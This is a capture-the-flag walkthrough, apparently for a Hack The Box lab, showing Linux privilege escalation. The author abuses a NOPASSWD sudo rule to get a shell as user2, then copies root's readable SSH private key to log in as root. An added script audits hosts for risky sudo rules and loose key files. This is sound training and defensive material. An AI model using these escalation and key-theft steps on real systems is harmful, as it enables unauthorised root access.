
Privilege Escalation

ℹ️ Information


Question

SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

SSH to [IP]:30980 with user "user1" and password "password1"

📋 Walkthrough

Log in over SSH using the provided credentials:

ssh user1@[IP] -p 30980
We get into the server.
user1@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~$ 
Check which commands we are allowed to run through sudo with sudo -l:
user1@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~$ sudo -l
Matching Defaults entries for user1 on ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:
    (user2 : user2) NOPASSWD: /bin/bash
The sudoers entry lets user1 run /bin/bash as user2 without a password, so we can elevate our privileges to that user:
user1@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~$ sudo -u user2 /bin/bash
user2@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:/home/user1$ 
We can find the flag in user2's home directory.

Answer

HTB{********************************}


Question

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

📋 Walkthrough

As user2, check what we can do in the filesystem. Listing the /root directory shows something interesting.

user2@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:/root$ ls -la
total 32
drwxr-x--- 1 root user2 4096 Feb 12  2021 .
drwxr-xr-x 1 root root  4096 Aug 24 11:59 ..
-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history
-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc
-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile
drwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh
-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo
-rw------- 1 root root    33 Feb 12  2021 flag.txt
user2@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:/root$ 
We can see the flag.txt file. We also notice that .ssh has user2 as its group owner, with read and execute permission for the group. We can check whether we are in that group using id. Entering the .ssh folder, we see that we can read the id_rsa key. Copy this key, set its permissions to 600, and try to log in as root using ssh -i key:
ssh -i key root@[IP] -p 30980
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~# cat flag.txt

Answer

HTB{***************************}
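
As an added example (not part of the original walkthrough), this script audits a host for the two misconfigurations used above: a sudo rule that hands out a shell, and private keys readable by group or other. The function names and the sample listing are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example; function names are hypothetical, not from the walkthrough.

# Read `sudo -l` output on stdin and print every rule that grants a shell or ALL.
flag_sudo_shells() {
    awk '
        /^[ \t]+\(/ {                                  # rule lines start with "(runas)"
            rule = $0; sub(/^[ \t]+/, "", rule)
            cmds = rule
            sub(/^\([^)]*\)[ \t]*/, "", cmds)          # drop the run-as spec
            gsub(/[A-Z_]+:[ \t]*/, "", cmds)           # drop tags such as NOPASSWD:
            n = split(cmds, c, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(c[i], w, " ")
                if (w[1] == "ALL" || w[1] ~ /\/(ba|da|z|k)?sh$/) {
                    print "RISKY: " rule
                    break
                }
            }
        }'
}

# Print private-key files under directory $1 that group or other can read.
flag_loose_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) \
        -exec grep -l -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' {} + 2>/dev/null || true
}

# Constructed sample: the sudo -l rule from the walkthrough plus one benign rule.
SAMPLE_SUDO_L='User user1 may run the following commands on host:
    (user2 : user2) NOPASSWD: /bin/bash
    (root) /usr/bin/systemctl status ssh'

printf '%s\n' "$SAMPLE_SUDO_L" | flag_sudo_shells
# Pass a directory (for example a home directory, as root) to audit key files.
if [ -n "${1:-}" ]; then flag_loose_keys "$1"; fi
```

Run as root, the key check reads file contents, so it also catches private keys that are not named id_rsa.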